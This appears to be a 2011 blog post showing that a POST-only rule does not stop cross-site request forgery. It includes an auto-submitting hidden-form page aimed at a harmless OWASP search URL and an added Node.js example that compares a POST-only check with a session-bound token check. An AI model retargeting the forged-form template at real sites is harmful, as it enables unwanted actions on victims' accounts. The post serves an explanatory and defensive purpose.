Monday, June 27, 2011

CSRF With POST

For anyone who needs a primer on Cross-Site Request Forgery (CSRF), I would recommend reading the white paper from White Hat: https://www.whitehatsec.com/resource/whitepapers/csrf_cross_site_request_forgery.html

I ran into a website the other day that thought only accepting POST data on a page was sufficient protection against CSRF attacks. Not so. A form can be sent automatically via POST almost as easily as via GET. Below you will find some example code that could be placed on a page to automatically exploit CSRF via POST.

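<html>
<body>
  <!-- Hidden form: the field is pre-filled, so the visitor sees nothing to fill in or click. -->
  <form name="csrf" action="https://www.owasp.org/index.php/Special:Search" method="post" id="csrf">
    <input type="hidden" name="search" value="csrf" />
  </form>
  <script type="text/javascript">
    // Submit the form via POST without any user interaction.
    function csrf_post() {
      var form = document.getElementById("csrf");
      form.submit();
    }
    // Run as soon as the page has finished loading.
    window.onload = csrf_post;
  </script>
</body>
</html>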
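On the server side, the difference between the "POST only" check and a real CSRF defense looks like this. This is an added example, not code from the original post or from any site it mentions; the in-memory session store, the `sid` cookie and the `csrf_token` field name are assumptions made for illustration, and the request objects are constructed samples.

```javascript
// Added example: models the server's decision without a web framework.
const nodeCrypto = require("node:crypto");

// Hypothetical in-memory session store: session id -> per-session CSRF token.
const sessions = new Map();

function newSession() {
  const id = nodeCrypto.randomBytes(16).toString("hex");
  sessions.set(id, { csrfToken: nodeCrypto.randomBytes(32).toString("hex") });
  return id;
}

// The flawed check described in the post: any POST is treated as trusted.
function postOnlyCheck(req) {
  return req.method === "POST";
}

// Synchronizer-token check: the body must carry the token bound to the session.
// A page on another origin can make the browser send the cookie, but it cannot
// read the token that the site embedded in its own form.
function tokenCheck(req) {
  if (req.method !== "POST") return false;
  const session = sessions.get(req.cookies.sid);
  if (!session) return false;
  const sent = Buffer.from(String(req.body.csrf_token || ""));
  const expected = Buffer.from(session.csrfToken);
  // timingSafeEqual throws on a length mismatch, so compare lengths first.
  return sent.length === expected.length &&
    nodeCrypto.timingSafeEqual(sent, expected);
}

// Constructed sample requests. The browser attaches the session cookie to both.
const sid = newSession();
const legitimate = {
  method: "POST",
  cookies: { sid },
  body: { search: "csrf", csrf_token: sessions.get(sid).csrfToken },
};
const forged = { method: "POST", cookies: { sid }, body: { search: "csrf" } };

console.log("POST-only check accepts forged request:", postOnlyCheck(forged));
console.log("Token check accepts forged request:", tokenCheck(forged));
console.log("Token check accepts legitimate request:", tokenCheck(legitimate));
```
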

I am sure that there are many effective ways to do this, so post a comment with your favorite way to exploit CSRF via POST and why.
(Hee hee, "POST a comment", I'm so funny.)